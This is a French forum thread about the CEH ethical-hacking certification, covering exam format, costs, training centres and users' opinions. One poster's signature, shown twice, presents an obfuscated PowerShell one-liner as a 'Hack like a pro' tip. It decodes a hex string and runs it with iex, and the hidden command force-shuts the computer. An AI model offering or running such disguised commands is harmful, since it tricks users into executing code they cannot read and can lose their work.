Annonce

Réduire
Aucune annonce.

Qu'est-ce que le la certification CEH (certified ethical hacker)

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Qu'est-ce que le la certification CEH (certified ethical hacker)

    Qu'est-ce que le la certification CEH (certified ethical hacker)


    Présentation :
    Le Certified Ethical Hacker (CEH) est une certification créé par le EC-Council certifiant vos compétences en recherche de faiblesses et de vulnérabilités à l'encontre d'un système cible.
    Cet examen est aussi reconnu sous le code 312-50. La dernière version de cette certification est la version 8, parue fin 2013.

    L'examen en question est un QCM à choix multiple de 125 questions, avec un temps limité de 4 heures. La validation de l'examen requiert un score de bonne réponse d'au moins 70%

    Prix :
    - Self study : $825 (pour être éligible il faut pouvoir prouver une expérience d'au moins 2 ans dans le domaine de la sécurité)
    - Formation en ligne (en anglais) : $2,895
    - Formation dans un centre français cerifié EC-Council (Centre ATC) : environ 3500€

    Durée de validité de la certification : 3 ans

    Où passer la certification :
    a) En ligne : Site EC-Council
    b) Dans un Centre ATC français :
    - Sysdream
    (à compléter)

    Avis :
    Certification de base, quasi indispensable mais trop théorique pour certains.

    Plus de détail sur l'examen et les entraînements ici.


    Suivre Hackademics: Twitter, Google+, Facebook.

  • #2
    bonsoir,

    je voudrais connaitre les retours sur cette certification et sa valeur en entreprise? Cette certification seul suffit pour travailler ou elle est utilisé comme complément ?

    Commentaire


    • #3
      Cette certification ne te ferra pas apprendre, elle rajoutera juste une ligne sur ton CV. (Et encore, son utilité est controversée).
      Bref si tu veux mon avis (purement subjectif) : cette certif c'est du vent

      Si tu as du temps et une motivation a toute épreuve, préfères (de loin) l'OSCP (et en plus elle est moins cher) :
      https://www.offensive-security.com/i...-professional/

      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Elle ma l'air vraiment difficile il faut avoir plusieurs années expériences non?

        Commentaire


        • #5
          Oui assez hard, d'où le "motivation a toute épreuve". Après il est toujours possible de progresser rapidement quand on est impliqué
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

          Commentaire


          • #6
            Bonjour j'aimerais savoir si quelqu'un a la formation CEH du site alphorm en Français svp ?

            Commentaire


            • #7
              Salut les hackadémicien,

              J'ai une petite question pour vous.

              Mon entreprise me propose de passer la certification CEH en présentiel.
              J'ai trouvé 2 formations qui m'ont l'air pas mal du tout :
              - Akaoma (5 jours entre 9h et 18h) en haute normandie ;
              - et Sysdream (5 jours entre 9h30 et 17h30) à paris

              Donc je voulais avoir vos avis sur ces 2 formations, si certains d'entre vous l'ont déjà passée ou entendu parler de ces 2 centres de formation ?

              Commentaire

              Chargement...
              X